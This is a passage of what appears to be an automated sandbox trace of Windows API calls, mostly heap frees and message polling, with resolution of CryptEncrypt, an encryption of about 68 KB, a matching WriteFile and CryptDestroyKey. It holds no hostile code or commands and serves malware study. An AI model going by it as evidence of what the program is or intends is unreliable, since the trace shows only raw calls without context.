hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.184] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0222.184] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.184] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0222.184] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fd0 | out: hHeap=0x2af0000) returned 1 [0222.184] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0222.184] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0222.184] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0222.184] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0222.184] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78318 | out: hHeap=0x2af0000) returned 1 [0222.184] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0222.184] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0222.184] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8f0 | out: hHeap=0x2af0000) returned 1 [0222.184] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0222.184] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0222.184] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0222.184] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0222.184] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ecc0 | out: hHeap=0x2af0000) returned 1 [0222.184] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0222.184] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0222.184] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7e8 | out: hHeap=0x2af0000) returned 1 [0222.184] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7b8 | out: hHeap=0x2af0000) returned 1 [0222.184] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0222.184] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0222.184] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0222.184] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0222.184] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0222.184] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0222.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0222.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0222.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0222.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0222.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0222.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0222.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0222.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab830 | out: hHeap=0x2af0000) returned 1 [0222.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9b0 | out: hHeap=0x2af0000) returned 1 [0222.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0222.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0222.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0222.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783e0 | out: hHeap=0x2af0000) returned 1 [0222.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0222.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0222.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0222.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0222.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0222.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9b0 | out: hHeap=0x2af0000) returned 1 [0222.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0222.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0222.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0222.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabbf0 | out: hHeap=0x2af0000) returned 1 [0222.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0222.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9b0 | out: hHeap=0x2af0000) returned 1 [0222.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0222.186] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0222.187] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0222.187] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3867020 | out: hHeap=0x2af0000) returned 1 [0222.187] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0222.187] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc98 | out: hHeap=0x2af0000) returned 1 [0222.187] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb00 | out: hHeap=0x2af0000) returned 1 [0222.187] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0222.187] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0222.188] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0222.188] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0222.188] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabcc8 | out: hHeap=0x2af0000) returned 1 [0222.188] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabcf8 | out: hHeap=0x2af0000) returned 1 [0222.188] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc98 | out: hHeap=0x2af0000) returned 1 [0222.188] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0222.188] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0222.188] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba40 | out: hHeap=0x2af0000) returned 1 [0222.188] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0222.188] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabab8 | out: hHeap=0x2af0000) returned 1 [0222.188] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0222.188] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb00 | out: hHeap=0x2af0000) returned 1 [0222.188] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0222.188] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba88 | out: hHeap=0x2af0000) returned 1 [0222.188] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0222.188] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabcf8 | out: hHeap=0x2af0000) returned 1 [0222.188] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0222.188] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb18 | out: hHeap=0x2af0000) returned 1 [0222.188] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0222.188] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb30 | out: hHeap=0x2af0000) returned 1 [0222.188] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0222.188] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0222.188] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aabcf8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0222.189] CryptEncrypt (in: hKey=0x9e1d38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x10984, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x10988) returned 1 [0222.189] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.189] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.189] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.193] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.193] CharLowerBuffW (in: lpsz="byte[67976]", cchLength=0xb | out: lpsz="byte[67976]") returned 0xb [0222.193] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.194] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.194] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0222.194] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0222.194] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0222.194] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0222.194] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0222.194] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0222.194] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0222.194] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aabaa0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0222.194] CryptEncrypt (in: hKey=0x9e1d38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3867020*, pdwDataLen=0x8cef60*=0x10984, dwBufLen=0x10988 | out: pbData=0x3867020*, pdwDataLen=0x8cef60*=0x10988) returned 1 [0222.197] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.197] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.197] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.197] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.197] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.197] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.197] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.197] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0222.197] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0222.197] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0222.197] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0222.197] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0222.197] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0222.197] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0222.197] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0222.197] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0222.197] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0222.198] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0222.198] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0222.198] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0222.198] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0222.198] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0222.198] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0222.198] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0222.198] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0222.198] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0222.198] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.203] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.203] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.203] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.204] WriteFile (in: hFile=0x4dc, lpBuffer=0x2a8a138*, nNumberOfBytesToWrite=0x10988, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2a8a138*, lpNumberOfBytesWritten=0x8cf5e4*=0x10988, lpOverlapped=0x0) returned 1 [0222.206] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.206] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.206] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0222.206] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0222.206] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0222.206] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0222.206] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0222.206] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0222.206] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0222.206] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0222.207] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0222.207] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0222.207] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0222.207] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0222.207] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aab998, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0222.207] CryptDestroyKey (hKey=0x9e1d38) returned 1 [0222.207] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0222.207] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0222.207] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0222.207] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0222.207] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0222.207] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0222.207] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0222.207] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0222.207] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0222.207] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0222.207] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0222.207] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0222.207] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0222.207] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0222.207] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0222.207] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0222.208] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0222.208] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0222.208] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0222.208] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0222.208] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0222.208] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0222.208] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0222.208] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.208] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0222.208] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0222.208] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0222.208] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0222.208] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0222.208] CharUpperBuffW (in: lpsz="A0000901A0E", 